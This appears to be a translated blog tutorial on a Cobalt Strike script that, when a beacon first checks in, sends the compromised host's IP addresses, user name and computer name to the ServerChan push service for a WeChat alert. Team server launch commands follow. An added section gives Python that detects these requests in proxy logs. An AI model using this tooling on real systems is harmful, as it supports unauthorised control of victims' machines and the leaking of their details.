Use ServerChan to get a WeChat reminder when a Cobalt Strike host comes online
Experiment idea: do it with the help of ServerChan (Server酱)
ServerChan
Website address: http://sc.ftqq.com/3.version
Log in
You need to log in to this website; you can also log in with your GitHub account with one click. Then bind "WeChat Push"
and click "Send Message" to run a test and confirm that the message is received normally. The "call code" next to it will be needed in a moment, so copy it, and then you can leave the page.
Prepare the script
Prepare a script called http_ftqq.cna; if you want to ask why, just ask ServerChan.
Fill in the SCKEY on line 25 of the script; it is the "call code" you just copied.
# Runs for every beacon on its first check-in
on beacon_initial {
    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];
        @content = readAll($handle);
        # Close the handle once the response has been read
        closef($handle);
        foreach $line (@content) {
            $output .= $line . "\r\n";
        }
        println($output);
    }
    # Get the IPs, computer name and login account
    $externalIP = replace(beacon_info($1, "external"), " ", "_");
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    # Send a GET request to the ServerChan link.
    # Replace the placeholder 此处填写你Server酱的SCKEY码 ("fill in your ServerChan SCKEY here") with your SCKEY.
    # The percent-encoded text is the title "CobaltStrike online reminder" and a body
    # labelled external IP, internal IP, user name and computer name.
    $url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
    http_get($url);
}
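Seen from the monitoring side, the GET request this script sends has a recognisable shape and carries the host details in its query string. The following added example (not part of the original post) scans proxy log lines for that request and decodes the fields; the log format, the sample lines and every value in them are constructed, and a TLS-inspecting proxy that logs full URLs is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Labels the script puts in the message body, mapped to English field names.
LABELS = {"外网ip": "external_ip", "内网ip": "internal_ip",
          "用户名": "user", "计算机名": "computer"}
SEND_PATH = re.compile(r"^/([^/]+)\.send$")  # /<SCKEY>.send

# Constructed sample: "<timestamp> <source host> <url>" (assumed log format).
SAMPLE_LOG = (
    "2024-01-01T10:00:00Z 10.0.0.5 https://sc.ftqq.com/SCKEY_PLACEHOLDER.send"
    "?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92"
    "&desp=%e5%a4%96%e7%bd%91ip:203.0.113.7%0D%0A%0D%0A"
    "%e5%86%85%e7%bd%91ip:192.168.1.20%0D%0A%0D%0A"
    "%e7%94%a8%e6%88%b7%e5%90%8d:alice%0D%0A%0D%0A"
    "%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:WS-01\n"
    "2024-01-01T10:00:05Z 10.0.0.9 https://example.com/index.html?text=hello\n"
)


def parse_notification(url):
    """Decode a ServerChan push in this script's format; None if it is not one."""
    parts = urlsplit(url)
    match = SEND_PATH.match(parts.path)
    if parts.hostname != "sc.ftqq.com" or not match:
        return None
    query = parse_qs(parts.query)  # percent-decodes the values as UTF-8
    fields = {"sckey": match.group(1), "title": query.get("text", [""])[0]}
    for line in query.get("desp", [""])[0].splitlines():
        label, sep, value = line.partition(":")
        if sep and label in LABELS:
            fields[LABELS[label]] = value
    return fields


def scan(log_text):
    """Return (timestamp, source host, fields) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        cols = line.split(None, 2)
        if len(cols) == 3 and (fields := parse_notification(cols[2])):
            hits.append((cols[0], cols[1], fields))
    return hits


if __name__ == "__main__":
    for ts, src, fields in scan(SAMPLE_LOG):
        print(ts, src, fields)
```

The source host in a hit is the machine where the script is loaded, and the decoded fields show which host details were sent to the third-party push service.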
Cobalt Strike preparation
The next step is to bring a host online; set it up however you like.
Start the CS server on Kali:
sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456
Start the CS client on Kali:
sudo chmod +x start.sh
./start.sh
Load the script
Create a new listener
Prepare the victim
The host comes online